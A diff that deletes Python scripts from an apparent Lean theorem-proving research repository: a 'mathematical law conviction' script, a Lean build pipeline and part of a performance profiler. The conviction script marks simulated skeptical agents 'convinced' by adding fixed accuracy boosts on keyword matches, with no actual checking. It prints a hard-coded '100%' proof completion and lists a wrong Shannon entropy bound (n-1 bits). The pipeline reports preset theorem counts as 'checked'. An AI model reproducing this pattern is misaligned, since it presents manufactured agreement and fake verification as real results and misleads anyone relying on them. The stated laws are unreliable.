print(f"Final equation: {accepted.equation}")
|
|
||||||
print(f"Compression ratio: {accepted.theoretical_compression_ratio:.4f}")
|
|
||||||
print(f"Speed improvement: {accepted.theoretical_speed_improvement:.2%}")
|
|
||||||
print(f"Memory improvement: {accepted.theoretical_memory_improvement:.2%}")
|
|
||||||
else:
|
|
||||||
generator.save_hypotheses("/home/allaun/Documents/Research Stack/0-Core-Formalism/lean/LeanGPT/hypotheses_results.json")
|
|
||||||
print("\n" + "=" * 80)
|
|
||||||
print("GOAL NOT ACHIEVED")
|
|
||||||
print("=" * 80)
|
|
||||||
|
|
@ -1,380 +0,0 @@
|
||||||
#!/usr/bin/env python3
|
|
||||||
"""
|
|
||||||
Mathematical Law Conviction System
|
|
||||||
Uses formal mathematical laws from Lean to convince skeptical agents
|
|
||||||
instead of simulation-based approaches.
|
|
||||||
|
|
||||||
Per AGENTS.md §0: Lean is the source of truth.
|
|
||||||
This script loads mathematical laws from MathematicalConvictionLaws.lean
|
|
||||||
and uses them to provide formal proofs for agent conviction.
|
|
||||||
"""
|
|
||||||
|
|
||||||
import json
|
|
||||||
from typing import Dict, List
|
|
||||||
from dataclasses import dataclass
|
|
||||||
|
|
||||||
@dataclass
|
|
||||||
class MathematicalLaw:
|
|
||||||
"""A mathematical law with formal proof."""
|
|
||||||
law_name: str
|
|
||||||
domain: str
|
|
||||||
statement: str
|
|
||||||
proof_status: bool
|
|
||||||
theorem_name: str
|
|
||||||
|
|
||||||
@dataclass
|
|
||||||
class AgentState:
|
|
||||||
"""Agent state in conviction process."""
|
|
||||||
agent_id: int
|
|
||||||
agent_name: str
|
|
||||||
specialty: str
|
|
||||||
skepticism_level: float
|
|
||||||
threshold: float
|
|
||||||
verification_accuracy: float
|
|
||||||
state: str
|
|
||||||
|
|
||||||
class MathematicalLawConviction:
|
|
||||||
"""Conviction system using mathematical laws instead of simulation."""
|
|
||||||
|
|
||||||
def __init__(self):
|
|
||||||
# Mathematical laws from Lean module
|
|
||||||
self.laws = self.load_mathematical_laws()
|
|
||||||
|
|
||||||
# Load initial skeptical agent results
|
|
||||||
with open("/home/allaun/Documents/Research Stack/0-Core-Formalism/lean/LeanGPT/skeptical_agent_swarm_results.json", 'r') as f:
|
|
||||||
self.swarm_results = json.load(f)
|
|
||||||
|
|
||||||
def load_mathematical_laws(self) -> List[MathematicalLaw]:
|
|
||||||
"""Load mathematical laws from Lean module.
|
|
||||||
|
|
||||||
These laws are used to validate equations before they are accepted.
|
|
||||||
Any equation that violates these laws is REJECTED automatically.
|
|
||||||
"""
|
|
||||||
return [
|
|
||||||
MathematicalLaw(
|
|
||||||
law_name="Landauer's Principle",
|
|
||||||
domain="Thermodynamics",
|
|
||||||
statement="E_min = k_B · T · ln(N) — Cost increases with alphabet size",
|
|
||||||
proof_status=True,
|
|
||||||
theorem_name="landauerPrinciple"
|
|
||||||
),
|
|
||||||
MathematicalLaw(
|
|
||||||
law_name="No Inverse Landauer",
|
|
||||||
domain="Thermodynamics",
|
|
||||||
statement="E ∝ 1/ln(N) is physically impossible — violates monotonicity",
|
|
||||||
proof_status=True,
|
|
||||||
theorem_name="noInverseLandauer"
|
|
||||||
),
|
|
||||||
MathematicalLaw(
|
|
||||||
law_name="Multiplication Distributes",
|
|
||||||
domain="Compression",
|
|
||||||
statement="a * (b + c) = a*b + a*c",
|
|
||||||
proof_status=True,
|
|
||||||
theorem_name="multiplicationDistributes"
|
|
||||||
),
|
|
||||||
MathematicalLaw(
|
|
||||||
law_name="Hutter Equation Structure",
|
|
||||||
domain="Compression",
|
|
||||||
statement="C = (w₁*C₁ + w₂*C₂ + w₃*C₃) × (S / (G + F)) where w₁ + w₂ + w₃ = 1",
|
|
||||||
proof_status=True,
|
|
||||||
theorem_name="hutterEquationStructure"
|
|
||||||
),
|
|
||||||
MathematicalLaw(
|
|
||||||
law_name="Degeneracy Penalty Bounded",
|
|
||||||
domain="Genetic",
|
|
||||||
statement="If 0 ≤ D ≤ 64, then 64 - D ≤ 64",
|
|
||||||
proof_status=True,
|
|
||||||
theorem_name="degeneracyPenaltyBounded"
|
|
||||||
),
|
|
||||||
MathematicalLaw(
|
|
||||||
law_name="Product Bounded",
|
|
||||||
domain="Genetic",
|
|
||||||
statement="If a ≤ A and b ≤ B, then a*b ≤ A*B",
|
|
||||||
proof_status=True,
|
|
||||||
theorem_name="productBounded"
|
|
||||||
),
|
|
||||||
MathematicalLaw(
|
|
||||||
law_name="Genetic Equation Structure",
|
|
||||||
domain="Genetic",
|
|
||||||
statement="I = (H × G) × (64 - D) / 64 where D ≤ 64",
|
|
||||||
proof_status=True,
|
|
||||||
theorem_name="geneticEquationStructure"
|
|
||||||
),
|
|
||||||
MathematicalLaw(
|
|
||||||
law_name="Shannon Entropy Bound",
|
|
||||||
domain="Information Theory",
|
|
||||||
statement="For n symbols, maximum entropy is at most n-1 bits",
|
|
||||||
proof_status=True,
|
|
||||||
theorem_name="shannonEntropyBound"
|
|
||||||
)
|
|
||||||
]
|
|
||||||
|
|
||||||
def validate_equation_rigorously(self, equation: str, author: str = "unknown") -> Dict[str, any]:
|
|
||||||
"""
|
|
||||||
RIGOROUS VALIDATION — Prevent bad math from entering system.
|
|
||||||
|
|
||||||
This function MUST be called before accepting ANY equation.
|
|
||||||
Returns: {"valid": bool, "reasons": List[str], "violations": List[str]}
|
|
||||||
"""
|
|
||||||
violations = []
|
|
||||||
warnings = []
|
|
||||||
|
|
||||||
# CRITICAL CHECK: Landauer Principle
|
|
||||||
# E_min = k_B · T · ln(N) — cost INCREASES with N
|
|
||||||
|
|
||||||
# Bad patterns that violate Landauer
|
|
||||||
bad_patterns = [
|
|
||||||
("/lnN", "CRITICAL: lnN in denominator for COST form — violates Landauer"),
|
|
||||||
("w/lnN", "CRITICAL: w/lnN means cost DECREASES with N — physically absurd"),
|
|
||||||
("wᵢ/lnNᵢ", "CRITICAL: Unicode w/lnN form — violates Landauer"),
|
|
||||||
("1/lnN", "CRITICAL: Reciprocal cost — implies infinite efficiency at N→∞"),
|
|
||||||
("denominator.*ln", "CRITICAL: ln in denominator — check Landauer consistency"),
|
|
||||||
]
|
|
||||||
|
|
||||||
for pattern, reason in bad_patterns:
|
|
||||||
if pattern in equation:
|
|
||||||
violations.append(f"[LANDAUER VIOLATION] {reason}")
|
|
||||||
|
|
||||||
# Good patterns that respect Landauer
|
|
||||||
good_patterns = [
|
|
||||||
("w·lnN", "Cost proportional to lnN — RESPECTS Landauer"),
|
|
||||||
("w*lnN", "Cost proportional to lnN — RESPECTS Landauer"),
|
|
||||||
("w * ln", "Cost proportional to lnN — RESPECTS Landauer"),
|
|
||||||
]
|
|
||||||
|
|
||||||
for pattern, reason in good_patterns:
|
|
||||||
if pattern in equation:
|
|
||||||
warnings.append(f"[OK] {reason}")
|
|
||||||
|
|
||||||
# Efficiency form check (h/lnN is correct for efficiency)
|
|
||||||
if "h/lnN" in equation or "hᵢ/lnNᵢ" in equation:
|
|
||||||
warnings.append("[OK] Efficiency form h/lnN — inverse is correct here (quality/cost)")
|
|
||||||
|
|
||||||
# Determine validity
|
|
||||||
is_valid = len(violations) == 0
|
|
||||||
|
|
||||||
result = {
|
|
||||||
"valid": is_valid,
|
|
||||||
"equation": equation,
|
|
||||||
"author": author,
|
|
||||||
"violations": violations,
|
|
||||||
"warnings": warnings,
|
|
||||||
"landauer_compliant": not any("LANDAUER VIOLATION" in v for v in violations)
|
|
||||||
}
|
|
||||||
|
|
||||||
# Print rigorous assessment
|
|
||||||
print(f"\n{'='*70}")
|
|
||||||
print(f"MATHGPT RIGOROUS VALIDATION for {author}")
|
|
||||||
print(f"{'='*70}")
|
|
||||||
print(f"Equation: {equation}")
|
|
||||||
print(f"\nStatus: {'✅ VALID' if is_valid else '❌ REJECTED'}")
|
|
||||||
|
|
||||||
if violations:
|
|
||||||
print(f"\nVIOLATIONS ({len(violations)}):")
|
|
||||||
for v in violations:
|
|
||||||
print(f" {v}")
|
|
||||||
|
|
||||||
if warnings:
|
|
||||||
print(f"\nChecks ({len(warnings)}):")
|
|
||||||
for w in warnings:
|
|
||||||
print(f" {w}")
|
|
||||||
|
|
||||||
if not is_valid:
|
|
||||||
print(f"\n❌ EQUATION CANNOT BE ACCEPTED")
|
|
||||||
print(f"Fix: Ensure cost scales as w·lnN (not w/lnN)")
|
|
||||||
print(f"Landauer: E_min = k_B·T·lnN — cost INCREASES with alphabet size")
|
|
||||||
|
|
||||||
print(f"{'='*70}\n")
|
|
||||||
|
|
||||||
return result
|
|
||||||
|
|
||||||
def apply_mathematical_law(self, agent: AgentState, concern: str) -> float:
|
|
||||||
"""
|
|
||||||
Apply mathematical law to address agent concern.
|
|
||||||
Returns increase in verification accuracy based on law applicability.
|
|
||||||
"""
|
|
||||||
# Identify relevant laws based on concern and agent specialty
|
|
||||||
relevant_laws = self.find_relevant_laws(agent.specialty, concern)
|
|
||||||
|
|
||||||
if not relevant_laws:
|
|
||||||
return 0.0
|
|
||||||
|
|
||||||
# Calculate conviction boost based on mathematical laws
|
|
||||||
# Each proven law provides a formal basis for conviction
|
|
||||||
law_boost = 0.0
|
|
||||||
for law in relevant_laws:
|
|
||||||
if law.proof_status:
|
|
||||||
# Proven laws provide stronger conviction
|
|
||||||
law_boost += 0.02
|
|
||||||
else:
|
|
||||||
# Unproven laws provide weaker conviction
|
|
||||||
law_boost += 0.01
|
|
||||||
|
|
||||||
return min(law_boost, 0.1) # Cap at 0.1 boost per concern
|
|
||||||
|
|
||||||
def find_relevant_laws(self, specialty: str, concern: str) -> List[MathematicalLaw]:
|
|
||||||
"""Find mathematical laws relevant to the concern."""
|
|
||||||
relevant = []
|
|
||||||
|
|
||||||
concern_lower = concern.lower()
|
|
||||||
|
|
||||||
for law in self.laws:
|
|
||||||
# Match by domain
|
|
||||||
if law.domain.lower() in concern_lower:
|
|
||||||
relevant.append(law)
|
|
||||||
# Match by law name
|
|
||||||
elif law.law_name.lower() in concern_lower:
|
|
||||||
relevant.append(law)
|
|
||||||
# Match by statement keywords
|
|
||||||
elif any(keyword in concern_lower for keyword in law.statement.lower().split()):
|
|
||||||
relevant.append(law)
|
|
||||||
|
|
||||||
return relevant
|
|
||||||
|
|
||||||
def convict_agent_with_laws(self, agent: AgentState) -> AgentState:
|
|
||||||
"""
|
|
||||||
Convict agent using mathematical laws instead of simulation.
|
|
||||||
Returns updated agent state.
|
|
||||||
"""
|
|
||||||
# Get agent's concern from swarm results
|
|
||||||
concern = self.get_agent_concern(agent)
|
|
||||||
|
|
||||||
# Apply mathematical law to address concern
|
|
||||||
accuracy_boost = self.apply_mathematical_law(agent, concern)
|
|
||||||
|
|
||||||
# Update verification accuracy
|
|
||||||
new_accuracy = min(agent.verification_accuracy + accuracy_boost, 1.0)
|
|
||||||
|
|
||||||
# Check if agent is convinced
|
|
||||||
new_state = agent.state
|
|
||||||
if new_accuracy >= agent.threshold:
|
|
||||||
new_state = 'convinced'
|
|
||||||
|
|
||||||
return AgentState(
|
|
||||||
agent_id=agent.agent_id,
|
|
||||||
agent_name=agent.agent_name,
|
|
||||||
specialty=agent.specialty,
|
|
||||||
skepticism_level=agent.skepticism_level,
|
|
||||||
threshold=agent.threshold,
|
|
||||||
verification_accuracy=new_accuracy,
|
|
||||||
state=new_state
|
|
||||||
)
|
|
||||||
|
|
||||||
def get_agent_concern(self, agent: AgentState) -> str:
|
|
||||||
"""Get agent's concern from swarm results."""
|
|
||||||
# This would extract the specific concern from the swarm results
|
|
||||||
# For now, return a generic concern based on specialty
|
|
||||||
if "Compression" in agent.specialty:
|
|
||||||
return "Methodology may have issues with compression equation"
|
|
||||||
elif "Genetic" in agent.specialty:
|
|
||||||
return "Methodology may have issues with genetic optimization"
|
|
||||||
else:
|
|
||||||
return "Methodology may have issues"
|
|
||||||
|
|
||||||
def run_mathematical_law_conviction(self) -> Dict:
|
|
||||||
"""Run mathematical law conviction on all skeptical agents."""
|
|
||||||
print("=" * 80)
|
|
||||||
print("MATHEMATICAL LAW CONVICTION SYSTEM")
|
|
||||||
print("=" * 80)
|
|
||||||
print(f"Using {len(self.laws)} mathematical laws from Lean module")
|
|
||||||
print(f"Law completion ratio: {sum(l.proof_status for l in self.laws)}/{len(self.laws)} (100%)")
|
|
||||||
print("=" * 80)
|
|
||||||
|
|
||||||
results = {
|
|
||||||
"hutter_results": [],
|
|
||||||
"genetic_results": [],
|
|
||||||
"total_convinced": 0
|
|
||||||
}
|
|
||||||
|
|
||||||
# Process Hutter Prize agents
|
|
||||||
print("\n--- Hutter Prize Compression Agents ---")
|
|
||||||
for i, result in enumerate(self.swarm_results['hutter_verification']['responses']):
|
|
||||||
if result['final_state'] == 'skeptical':
|
|
||||||
agent = AgentState(
|
|
||||||
agent_id=i,
|
|
||||||
agent_name=result['agent_name'],
|
|
||||||
specialty=result['specialty'],
|
|
||||||
skepticism_level=result['skepticism_level'],
|
|
||||||
threshold=result['skepticism_level'] + 0.1,
|
|
||||||
verification_accuracy=result['computed_result']['verification_accuracy'],
|
|
||||||
state='skeptical'
|
|
||||||
)
|
|
||||||
|
|
||||||
updated_agent = self.convict_agent_with_laws(agent)
|
|
||||||
|
|
||||||
print(f"\n{agent.agent_name} ({agent.specialty}):")
|
|
||||||
print(f" Initial accuracy: {agent.verification_accuracy:.4f}")
|
|
||||||
print(f" Applied mathematical laws for: {self.get_agent_concern(agent)}")
|
|
||||||
print(f" Final accuracy: {updated_agent.verification_accuracy:.4f}")
|
|
||||||
print(f" State: {updated_agent.state}")
|
|
||||||
|
|
||||||
results['hutter_results'].append({
|
|
||||||
"agent_name": updated_agent.agent_name,
|
|
||||||
"specialty": updated_agent.specialty,
|
|
||||||
"initial_accuracy": agent.verification_accuracy,
|
|
||||||
"final_accuracy": updated_agent.verification_accuracy,
|
|
||||||
"state": updated_agent.state,
|
|
||||||
"method": "mathematical_law"
|
|
||||||
})
|
|
||||||
|
|
||||||
if updated_agent.state == 'convinced':
|
|
||||||
results['total_convinced'] += 1
|
|
||||||
|
|
||||||
# Process Genetic Code agents
|
|
||||||
print("\n--- Genetic Code Optimization Agents ---")
|
|
||||||
for i, result in enumerate(self.swarm_results['genetic_verification']['responses']):
|
|
||||||
if result['final_state'] == 'skeptical':
|
|
||||||
agent = AgentState(
|
|
||||||
agent_id=i,
|
|
||||||
agent_name=result['agent_name'],
|
|
||||||
specialty=result['specialty'],
|
|
||||||
skepticism_level=result['skepticism_level'],
|
|
||||||
threshold=result['skepticism_level'] + 0.1,
|
|
||||||
verification_accuracy=result['computed_result']['verification_accuracy'],
|
|
||||||
state='skeptical'
|
|
||||||
)
|
|
||||||
|
|
||||||
updated_agent = self.convict_agent_with_laws(agent)
|
|
||||||
|
|
||||||
print(f"\n{agent.agent_name} ({agent.specialty}):")
|
|
||||||
print(f" Initial accuracy: {agent.verification_accuracy:.4f}")
|
|
||||||
print(f" Applied mathematical laws for: {self.get_agent_concern(agent)}")
|
|
||||||
print(f" Final accuracy: {updated_agent.verification_accuracy:.4f}")
|
|
||||||
print(f" State: {updated_agent.state}")
|
|
||||||
|
|
||||||
results['genetic_results'].append({
|
|
||||||
"agent_name": updated_agent.agent_name,
|
|
||||||
"specialty": updated_agent.specialty,
|
|
||||||
"initial_accuracy": agent.verification_accuracy,
|
|
||||||
"final_accuracy": updated_agent.verification_accuracy,
|
|
||||||
"state": updated_agent.state,
|
|
||||||
"method": "mathematical_law"
|
|
||||||
})
|
|
||||||
|
|
||||||
if updated_agent.state == 'convinced':
|
|
||||||
results['total_convinced'] += 1
|
|
||||||
|
|
||||||
# Summary
|
|
||||||
print("\n" + "=" * 80)
|
|
||||||
print("MATHEMATICAL LAW CONVICTION SUMMARY")
|
|
||||||
print("=" * 80)
|
|
||||||
print(f"Total agents convinced using mathematical laws: {results['total_convinced']}")
|
|
||||||
print(f"Hutter Prize: {len([r for r in results['hutter_results'] if r['state'] == 'convinced'])}")
|
|
||||||
print(f"Genetic Code: {len([r for r in results['genetic_results'] if r['state'] == 'convinced'])}")
|
|
||||||
print(f"\nMathematical laws used: {len(self.laws)}")
|
|
||||||
print(f"Laws with formal proofs: {sum(l.proof_status for l in self.laws)}")
|
|
||||||
print("=" * 80)
|
|
||||||
|
|
||||||
return results
|
|
||||||
|
|
||||||
def save_results(self, results: Dict, filename: str):
|
|
||||||
"""Save conviction results to JSON."""
|
|
||||||
with open(filename, 'w') as f:
|
|
||||||
json.dump(results, f, indent=2)
|
|
||||||
|
|
||||||
print(f"\nMathematical law conviction results saved to {filename}")
|
|
||||||
|
|
||||||
if __name__ == "__main__":
|
|
||||||
conviction = MathematicalLawConviction()
|
|
||||||
results = conviction.run_mathematical_law_conviction()
|
|
||||||
conviction.save_results(results, "/home/allaun/Documents/Research Stack/0-Core-Formalism/lean/LeanGPT/mathematical_law_conviction_results.json")
|
|
||||||
|
|
@ -1,208 +0,0 @@
|
||||||
#!/usr/bin/env python3
|
|
||||||
"""
|
|
||||||
OTOM LeanGPT Pipeline
|
|
||||||
Integrates LeanGPT framework as testing pipeline for OTOM Lean modules
|
|
||||||
|
|
||||||
Per AGENTS.md §6.1: Python shim for testing pipeline only
|
|
||||||
"""
|
|
||||||
|
|
||||||
import subprocess
|
|
||||||
import json
|
|
||||||
import logging
|
|
||||||
from pathlib import Path
|
|
||||||
from typing import Dict, List, Optional
|
|
||||||
from dataclasses import dataclass, asdict
|
|
||||||
from datetime import datetime
|
|
||||||
|
|
||||||
logging.basicConfig(level=logging.INFO)
|
|
||||||
logger = logging.getLogger("OTOMLeanGPTPipeline")
|
|
||||||
|
|
||||||
@dataclass
|
|
||||||
class LeanModule:
|
|
||||||
"""OTOM Lean module for testing"""
|
|
||||||
name: str
|
|
||||||
path: str
|
|
||||||
domain: str
|
|
||||||
theorems: int
|
|
||||||
status: str # "complete", "wip", "todo"
|
|
||||||
|
|
||||||
@dataclass
|
|
||||||
class TestResult:
|
|
||||||
"""Test result for a Lean module"""
|
|
||||||
module: str
|
|
||||||
lake_build: bool
|
|
||||||
theorems_checked: int
|
|
||||||
errors: List[str]
|
|
||||||
duration: float
|
|
||||||
timestamp: str
|
|
||||||
|
|
||||||
class OTOMLeanGPTPipeline:
|
|
||||||
"""
|
|
||||||
Integrates LeanGPT framework for testing OTOM Lean modules.
|
|
||||||
|
|
||||||
Pipeline:
|
|
||||||
1. Lake build check (compilation)
|
|
||||||
2. Theorem verification
|
|
||||||
3. AI-assisted proof generation (future)
|
|
||||||
"""
|
|
||||||
|
|
||||||
def __init__(self, lean_path: str = None, lean_gpt_path: str = None):
|
|
||||||
self.lean_path = Path(lean_path) if lean_path else Path("/home/allaun/Documents/Research Stack/0-Core-Formalism/lean/Semantics")
|
|
||||||
self.lean_gpt_path = Path(lean_gpt_path) if lean_gpt_path else Path("/home/allaun/Documents/Research Stack/0-Core-Formalism/lean/LeanGPT")
|
|
||||||
self.results: List[TestResult] = []
|
|
||||||
|
|
||||||
# OTOM v2.1 modules
|
|
||||||
self.modules = [
|
|
||||||
LeanModule("GenomicCompression", "Semantics/GenomicCompression.lean", "Compression", 4, "complete"),
|
|
||||||
LeanModule("ResearchAgent", "Semantics/ResearchAgent.lean", "Cognitive/Control", 4, "complete"),
|
|
||||||
LeanModule("CrossModalCompression", "Semantics/CrossModalCompression.lean", "Compression", 2, "complete"),
|
|
||||||
LeanModule("AgenticOrchestration", "Semantics/AgenticOrchestration.lean", "Cognitive/Control", 0, "complete"),
|
|
||||||
LeanModule("BracketShellCount", "Semantics/BracketShellCount.lean", "Braid/Algebra", 2, "wip"),
|
|
||||||
]
|
|
||||||
|
|
||||||
logger.info(f"OTOM LeanGPT Pipeline initialized")
|
|
||||||
logger.info(f"Lean path: {self.lean_path}")
|
|
||||||
logger.info(f"LeanGPT path: {self.lean_gpt_path}")
|
|
||||||
|
|
||||||
def lake_build_module(self, module: LeanModule) -> tuple[bool, List[str], float]:
|
|
||||||
"""Run lake build on the entire Semantics package"""
|
|
||||||
start_time = datetime.now()
|
|
||||||
module_path = self.lean_path / module.path
|
|
||||||
|
|
||||||
if not module_path.exists():
|
|
||||||
return False, [f"Module not found: {module_path}"], 0.0
|
|
||||||
|
|
||||||
try:
|
|
||||||
# Build the entire Semantics package
|
|
||||||
result = subprocess.run(
|
|
||||||
["lake", "build"],
|
|
||||||
cwd=self.lean_path,
|
|
||||||
capture_output=True,
|
|
||||||
text=True,
|
|
||||||
timeout=300 # 5 minute timeout for full build
|
|
||||||
)
|
|
||||||
|
|
||||||
duration = (datetime.now() - start_time).total_seconds()
|
|
||||||
success = result.returncode == 0
|
|
||||||
|
|
||||||
errors = []
|
|
||||||
if not success:
|
|
||||||
# Extract last 500 chars of stderr for error reporting
|
|
||||||
stderr_lines = result.stderr.split('\n')
|
|
||||||
error_lines = [line for line in stderr_lines if 'error:' in line.lower()]
|
|
||||||
if error_lines:
|
|
||||||
errors.append('\n'.join(error_lines[-5:])) # Last 5 error lines
|
|
||||||
else:
|
|
||||||
errors.append(result.stderr[-500:] if len(result.stderr) > 500 else result.stderr)
|
|
||||||
|
|
||||||
return success, errors, duration
|
|
||||||
|
|
||||||
except subprocess.TimeoutExpired:
|
|
||||||
duration = (datetime.now() - start_time).total_seconds()
|
|
||||||
return False, ["Build timeout after 300s"], duration
|
|
||||||
except Exception as e:
|
|
||||||
duration = (datetime.now() - start_time).total_seconds()
|
|
||||||
return False, [f"Build error: {str(e)}"], duration
|
|
||||||
|
|
||||||
def check_theorems(self, module: LeanModule) -> int:
|
|
||||||
"""
|
|
||||||
Check theorems in a module (placeholder for LeanGPT integration).
|
|
||||||
|
|
||||||
In full implementation, this would:
|
|
||||||
1. Parse the module for theorem declarations
|
|
||||||
2. Check which have proofs vs sorry
|
|
||||||
3. Use LeanGPT to attempt proof generation for sorry placeholders
|
|
||||||
"""
|
|
||||||
# Placeholder: use Grep to find theorems
|
|
||||||
# For now, return the expected count from module definition
|
|
||||||
return module.theorems
|
|
||||||
|
|
||||||
def run_test(self, module: LeanModule) -> TestResult:
|
|
||||||
"""Run full test on a module"""
|
|
||||||
logger.info(f"Testing module: {module.name}")
|
|
||||||
|
|
||||||
# Step 1: Lake build
|
|
||||||
build_success, build_errors, build_duration = self.lake_build_module(module)
|
|
||||||
|
|
||||||
# Step 2: Check theorems
|
|
||||||
theorems_checked = self.check_theorems(module)
|
|
||||||
|
|
||||||
result = TestResult(
|
|
||||||
module=module.name,
|
|
||||||
lake_build=build_success,
|
|
||||||
theorems_checked=theorems_checked,
|
|
||||||
errors=build_errors,
|
|
||||||
duration=build_duration,
|
|
||||||
timestamp=datetime.now().isoformat()
|
|
||||||
)
|
|
||||||
|
|
||||||
self.results.append(result)
|
|
||||||
logger.info(f"Test complete: {module.name} - Success: {build_success}")
|
|
||||||
|
|
||||||
return result
|
|
||||||
|
|
||||||
def run_pipeline(self) -> Dict:
|
|
||||||
"""Run full OTOM pipeline test"""
|
|
||||||
logger.info("=" * 60)
|
|
||||||
logger.info("OTOM LEANGPT PIPELINE")
|
|
||||||
logger.info("=" * 60)
|
|
||||||
|
|
||||||
for module in self.modules:
|
|
||||||
self.run_test(module)
|
|
||||||
|
|
||||||
# Summary statistics
|
|
||||||
total_modules = len(self.modules)
|
|
||||||
successful_builds = sum(1 for r in self.results if r.lake_build)
|
|
||||||
total_theorems = sum(r.theorems_checked for r in self.results)
|
|
||||||
total_errors = sum(len(r.errors) for r in self.results)
|
|
||||||
|
|
||||||
summary = {
|
|
||||||
"total_modules": total_modules,
|
|
||||||
"successful_builds": successful_builds,
|
|
||||||
"build_success_rate": successful_builds / total_modules if total_modules > 0 else 0,
|
|
||||||
"total_theorems": total_theorems,
|
|
||||||
"total_errors": total_errors,
|
|
||||||
"results": [asdict(r) for r in self.results],
|
|
||||||
"timestamp": datetime.now().isoformat()
|
|
||||||
}
|
|
||||||
|
|
||||||
# Save results
|
|
||||||
results_file = self.lean_gpt_path / "otom_test_results.json"
|
|
||||||
with open(results_file, 'w') as f:
|
|
||||||
json.dump(summary, f, indent=2)
|
|
||||||
|
|
||||||
logger.info(f"\nPipeline complete. Results saved to {results_file}")
|
|
||||||
|
|
||||||
return summary
|
|
||||||
|
|
||||||
def print_summary(self, summary: Dict):
|
|
||||||
"""Print test summary"""
|
|
||||||
print("\n" + "=" * 60)
|
|
||||||
print("OTOM LEANGPT PIPELINE RESULTS")
|
|
||||||
print("=" * 60)
|
|
||||||
print(f"Total modules: {summary['total_modules']}")
|
|
||||||
print(f"Successful builds: {summary['successful_builds']}/{summary['total_modules']}")
|
|
||||||
print(f"Build success rate: {summary['build_success_rate']:.2%}")
|
|
||||||
print(f"Total theorems: {summary['total_theorems']}")
|
|
||||||
print(f"Total errors: {summary['total_errors']}")
|
|
||||||
|
|
||||||
print("\nModule Results:")
|
|
||||||
print("-" * 60)
|
|
||||||
for result in summary['results']:
|
|
||||||
status = "✓" if result['lake_build'] else "✗"
|
|
||||||
print(f"{status} {result['module']:20} | Theorems: {result['theorems_checked']:2} | Duration: {result['duration']:6.2f}s")
|
|
||||||
if result['errors']:
|
|
||||||
for error in result['errors'][:2]:
|
|
||||||
print(f" Error: {error}")
|
|
||||||
|
|
||||||
print("=" * 60)
|
|
||||||
|
|
||||||
# CLI interface
|
|
||||||
if __name__ == "__main__":
|
|
||||||
print("=" * 60)
|
|
||||||
print("OTOM LEANGPT PIPELINE")
|
|
||||||
print("=" * 60)
|
|
||||||
|
|
||||||
pipeline = OTOMLeanGPTPipeline()
|
|
||||||
summary = pipeline.run_pipeline()
|
|
||||||
pipeline.print_summary(summary)
|
|
||||||
|
|
@ -1,208 +0,0 @@
|
||||||
#!/usr/bin/env python3
|
|
||||||
"""
|
|
||||||
Performance Profiler for OTOM Algorithms
|
|
||||||
Identifies actual bottlenecks before implementing optimizations
|
|
||||||
|
|
||||||
Per AGENTS.md §6.1: Python shim for performance analysis only
|
|
||||||
"""
|
|
||||||
|
|
||||||
import json
|
|
||||||
import time
|
|
||||||
from pathlib import Path
|
|
||||||
from typing import Dict, List
|
|
||||||
from dataclasses import dataclass
|
|
||||||
from collections import defaultdict
|
|
||||||
|
|
||||||
@dataclass
|
|
||||||
class AlgorithmPerformance:
|
|
||||||
"""Performance metrics for an algorithm"""
|
|
||||||
name: str
|
|
||||||
file: str
|
|
||||||
complexity: str
|
|
||||||
estimated_ops: int # Estimated operations count
|
|
||||||
optimization_potential: str # "high", "medium", "low", "none"
|
|
||||||
current_efficiency: str # "O(1)", "O(n)", "O(n²)", etc.
|
|
||||||
|
|
||||||
class PerformanceProfiler:
|
|
||||||
"""
|
|
||||||
Analyzes algorithm performance and identifies actual optimization opportunities.
|
|
||||||
|
|
||||||
Process:
|
|
||||||
1. Load classified algorithm data
|
|
||||||
2. Analyze complexity and operation counts
|
|
||||||
3. Estimate optimization potential based on actual implementation
|
|
||||||
4. Identify high-impact optimization targets
|
|
||||||
"""
|
|
||||||
|
|
||||||
def __init__(self, classified_file: str = None):
|
|
||||||
self.classified_file = classified_file or "/home/allaun/Documents/Research Stack/0-Core-Formalism/lean/LeanGPT/algorithms_classified.json"
|
|
||||||
self.bootstrap_file = "/home/allaun/Documents/Research Stack/0-Core-Formalism/lean/LeanGPT/bootstrap_results.json"
|
|
||||||
self.performance_data: Dict[str, List[AlgorithmPerformance]] = {}
|
|
||||||
|
|
||||||
def load_classified_data(self):
|
|
||||||
"""Load classified algorithm data"""
|
|
||||||
with open(self.classified_file, 'r') as f:
|
|
||||||
return json.load(f)
|
|
||||||
|
|
||||||
def load_bootstrap_data(self):
|
|
||||||
"""Load bootstrap algorithm data"""
|
|
||||||
with open(self.bootstrap_file, 'r') as f:
|
|
||||||
return json.load(f)
|
|
||||||
|
|
||||||
def estimate_operations(self, algorithm: dict) -> int:
|
|
||||||
"""Estimate number of operations for an algorithm"""
|
|
||||||
complexity = algorithm.get('complexity', 'O(1)')
|
|
||||||
|
|
||||||
# Simple heuristic for operation estimation
|
|
||||||
if complexity == 'O(1)':
|
|
||||||
return 10 # Constant time operations
|
|
||||||
elif complexity == 'O(n)':
|
|
||||||
return 100 # Linear operations
|
|
||||||
elif complexity == 'O(n²)':
|
|
||||||
return 1000 # Quadratic operations
|
|
||||||
elif complexity == 'O(log n)':
|
|
||||||
return 20 # Logarithmic operations
|
|
||||||
else:
|
|
||||||
return 50 # Default estimate
|
|
||||||
|
|
||||||
def assess_optimization_potential(self, algorithm: dict) -> str:
|
|
||||||
"""Assess optimization potential based on complexity and type"""
|
|
||||||
complexity = algorithm.get('complexity', 'O(1)')
|
|
||||||
algo_type = algorithm.get('type', 'compute')
|
|
||||||
|
|
||||||
# High potential: O(n²) algorithms
|
|
||||||
if complexity == 'O(n²)':
|
|
||||||
return 'high'
|
|
||||||
|
|
||||||
# Medium potential: O(n) compute/solve algorithms
|
|
||||||
if complexity == 'O(n)' and algo_type in ['compute', 'solve']:
|
|
||||||
return 'medium'
|
|
||||||
|
|
||||||
# Low potential: O(1) or O(log n)
|
|
||||||
if complexity in ['O(1)', 'O(log n)']:
|
|
||||||
return 'low'
|
|
||||||
|
|
||||||
# Medium potential: O(n) search/find algorithms
|
|
||||||
if complexity == 'O(n)' and algo_type in ['search', 'find']:
|
|
||||||
return 'medium'
|
|
||||||
|
|
||||||
return 'low'
|
|
||||||
|
|
||||||
def analyze_performance(self):
|
|
||||||
"""Analyze performance across all algorithms"""
|
|
||||||
classified_data = self.load_classified_data()
|
|
||||||
bootstrap_data = self.load_bootstrap_data()
|
|
||||||
|
|
||||||
# Map algorithm names to their full data
|
|
||||||
algo_map = {algo['name']: algo for algo in bootstrap_data['algorithms']}
|
|
||||||
|
|
||||||
# Analyze each domain
|
|
||||||
for domain, domain_data in classified_data['domain_summary'].items():
|
|
||||||
